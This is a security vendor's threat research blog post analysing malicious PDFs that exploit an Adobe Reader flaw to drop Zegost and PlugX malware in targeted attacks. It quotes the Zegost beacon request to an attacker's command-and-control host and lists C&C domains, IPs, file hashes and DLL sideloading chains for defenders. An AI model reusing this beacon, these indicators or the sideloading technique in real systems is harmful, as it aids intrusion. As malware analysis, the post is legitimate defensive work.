• Trend Micro
  • About TrendLabs Security Intelligence Blog
Search:
  • Home
  • Categories
    • Ransomware
    • Vulnerabilities
    • Exploits
    • Targeted Attacks
    • Deep Web
    • Mobile
    • Internet of Things
    • Malware
    • Bad Sites
    • Spam
    • Botnets
    • Social
    • Open source
Home   »   Malware   »   Malicious PDFs On The Rise

Malicious PDFs On The Rise

  • Posted on:April 29, 2013 at 1:06 am
  • Posted in:Malware, Targeted Attacks
  • Author:
    Nart Villeneuve (Senior Threat Researcher)
0

Additional text and analysis by Kyle Wilhoit

Throughout 2012, we saw a wide variety of APT campaigns leverage an exploit in Microsoft Word (CVE-2012-0158). This represented a shift, as previously CVE-2010-3333 was the most commonly used Word vulnerability. While we continue to see CVE-2012-0158 in heavy use, we have noticed increasing use of an exploit for Adobe Reader (CVE-2013-0640) that was made infamous by the “MiniDuke” campaign. The malware dropped by these malicious PDFs is not associated with MiniDuke, but it is associated with ongoing APT campaigns.

Zegost

One set of malicious PDFs we found that used this exploit contained decoy documents in Vietnamese; the file names were also in the same language.


Figure 1. Sample decoy document

The PDFs contain embedded JavaScript code that it similar to the code used by the MiniDuke campaign. These similarities include similar function and variable names.


Figure 2. Similar JavaScript code

Analyzing the PDF using Didier Stevens’ PDFiD tool shows that the two PDFs are very similar. They may not be identical, but the similarities between the two are hard to deny. The fields of interest here are “/Javascript”, “/OpenAction”, and “/Page”. These fields mean JavaScript is present, automatic actions of some sort take place, and the page number. These three items helped us identify the similarities between MiniDuke and Zegost.

The dropped files and data are also similar. Both campaigns drop the same number of files, with very similar file names, with similar purposes. Even the registry modifications are not too dissimilar.

However, that is where the similarities end. The payload dropped by these PDFs is known as Zegost (or HTTPTunnel) and has been spotted in previous attacks. This has no connection with the MiniDuke malware payload.) The Zegost malware has a distinct beacon:

GET /cgi/online.asp?hostname=[COMPUTERNAME]&httptype=[1][not%20httptunnel] HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
Host: dns.yimg.ca
Cache-Control: no-cache

The command and control server, dns.yimg.ca, resolves to 223.26.55.122 which has been used by the more well known command and control servers like imm.conimes.com and iyy.conimes.com. The email addresses used to register this domain, llssddzz@gmail.com, has also been used to register scvhosts.com – another known C&C server – and updata-microsoft.com, which is probably also a threat.

PlugX

The second set of malicious PDFs are not necessarily directly related to one another, although they all drop different PlugX variants. The targets of the attacks we analyzed appear to have been sent to targets in Japan, South Korea, and India.

However, although these attacks also exploit CVE-2013-0640, they are different from the samples discussed above. When comparing the files, one can see the differences, such as the PDF version being used:

 

Zegost

MiniDuke

PlugX

 PDF Header: %PDF-1.4  PDF Header: %PDF-1.4  PDF Header: %PDF-1.7
 obj                    8  obj                    8  obj                   43
 endobj                 8  endobj                 8  endobj                44
 stream                 3  stream                 1  stream                10
 endstream              3  endstream              2  endstream             11
 xref                   1  xref                   1  xref                   4
 trailer                1  trailer                1  trailer                4
 startxref              1  startxref              1  startxref              4
 /Page                  1  /Page                  1  /Page                  6
 /Encrypt               0  /Encrypt               1  /Encrypt               0
 /ObjStm                0  /ObjStm                0  /ObjStm                0
 /JavaScript            1  /JavaScript            1  /JavaScript            1
 /AA                    0  /AA                    0  /AA                    0
 /OpenAction            1  /OpenAction            1  /OpenAction            1
 /AcroForm              1  /AcroForm              1  /AcroForm              1
 /JBIG2Decode           0  /JBIG2Decode           0  /JBIG2Decode           0
 /RichMedia             0  /RichMedia             0  /RichMedia             0
 /Launch                0  /Launch                0  /Launch                0
 /EmbeddedFile          0  /EmbeddedFile          0  /EmbeddedFile          0
 /XFA                   1  /XFA                   1  /XFA                   1
 /Colors > 2^24         0  /Colors > 2^24         0  /Colors > 2^24         0

PlugX also drops files and data, but these are not similar to those Zegost or MiniDuke. Different numbers of files, for different reasons, are dropped.

 

Zegost

MiniDuke

PlugX

UserCache.bin UserCache.bin UserCache.bin
39f5d27d1a5e34ce9863406b799ef47a 39f5d27d1a5e34ce9863406b799ef47a 39f5d27d1a5e34ce9863406b799ef47a
ACECache10.lst ACECache10.lst ACECache10.lst
a1bb36552f1336466b4d728948393585 77402ee32c656d68eeb8a07e2a041dfb 77e16369d995628ff9df31c56129a2f2
A9RD50B.tmp (PDF) A9RE077.tmp (PDF) SharedDataEvents
dd28e2e06465464f0cb5eca4a9013421 85b890c0b10faa13014d4a22dae3fe3c 1a8d23271be2c45f31a537eaefbbf55d
A9RD50A.tmp (PDF) A9RE078.tmp (PDF) SharedDataEvents-journal
4f4ceedd8da84be88dbea7b49f1b82e5 e719894252665a7cbf8efc18babdd70e 4754e6d5ea3b6ca2357146a1e56c3c47
SharedDataEvents-journal
b16f24e72c42059cd44a9fb48ea8bf98
A9RD53D.tmp (PDF)
200569e47e6e5a3f629533423d4ba03b
SharedDataEvents-journal
b930ef3a77e6c4669312f582fc405f61
SharedDataEvents-journal
38149cfb66075a9009d460e86c138141
SharedDataEvents-journal
566ea4be505009d422d5fd6c395a33b9
A9RD53C.tmp (PDF)
ca79b7a45410dd1e995a4997dcc6d126

PlugX: HHX

The first set of PlugX variants leverages the Microsoft HTML Help Compiler as described in this blog post. We have been able to detect this variant used in a targeted attack. In this case, the attackers sent an email to the intended target enticing them to open the malicious attachments.

The samples we analyzed dropped files in a directory named hhx and uses hhc.exe, which is a legitimate Microsoft file, to load hha.dll, which then loads hha.dll.bak. The command and control servers used by the files we analyzed included 14.102.252.142.

PlugX: PDH

The second set of PlugX variants we analyzed dropped files in a directory named PDH and leveraged a signed QQ Browser Update Service file to load PDH.dll, and then PDH.pak.


Figure 3. Signed file

 These files used dnsport.chatnook.com, inter.so-webmail.com, and 223.25.242.45 as their command-and-control servers.

Conclusion

Our research indicates that attackers engaged in APT campaigns may have adapted the exploit made infamous by the MiniDuke campaign and have incorporated it into their arsenal. At the same time, we have found that other APT campaigns seem to have developed their own methods to exploit the same vulnerability.  The increase in malicious PDF’s exploiting CVE-2013-0640 may indicate the start of shift in APT attacker behavior away from using malicious Word documents that exploit the now quite old CVE-2012-0158.

We’re trying to make the Security Intelligence Blog better. Please take this survey to tell us how.

Learn how to protect Enterprises, Small Businesses, and Home Users from ransomware:
ENTERPRISE »
SMALL BUSINESS»
HOME»
Tags: APTExploitsMicrosoft OfficepdfReader

Security Predictions for 2020

  • Cybersecurity in 2020 will be viewed through many lenses — from differing attacker motivations and cybercriminal arsenal to technological developments and global threat intelligence — only so defenders can keep up with the broad range of threats.
    Read our security predictions for 2020.

Business Process Compromise

  • Attackers are starting to invest in long-term operations that target specific processes enterprises rely on. They scout for vulnerable practices, susceptible systems and operational loopholes that they can leverage or abuse. To learn more, read our Security 101: Business Process Compromise.

Recent Posts

  • Our New Blog
  • How Unsecure gRPC Implementations Can Compromise APIs, Applications
  • XCSSET Mac Malware: Infects Xcode Projects, Performs UXSS Attack on Safari, Other Browsers, Leverages Zero-day Exploits
  • August Patch Tuesday Fixes Critical IE, Important Windows Vulnerabilities Exploited in the Wild
  • Water Nue Phishing Campaign Targets C-Suite’s Office 365 Accounts

Popular Posts

Sorry. No data so far.

Stay Updated

  • Home and Home Office
  • |
  • For Business
  • |
  • Security Intelligence
  • |
  • About Trend Micro
  • Asia Pacific Region (APAC): Australia / New Zealand, 中国, 日本, 대한민국, 台灣
  • Latin America Region (LAR): Brasil, México
  • North America Region (NABU): United States, Canada
  • Europe, Middle East, & Africa Region (EMEA): France, Deutschland / Österreich / Schweiz, Italia, Россия, España, United Kingdom / Ireland
  • Privacy Statement
  • Legal Policies
  • Copyright © Trend Micro Incorporated. All rights reserved.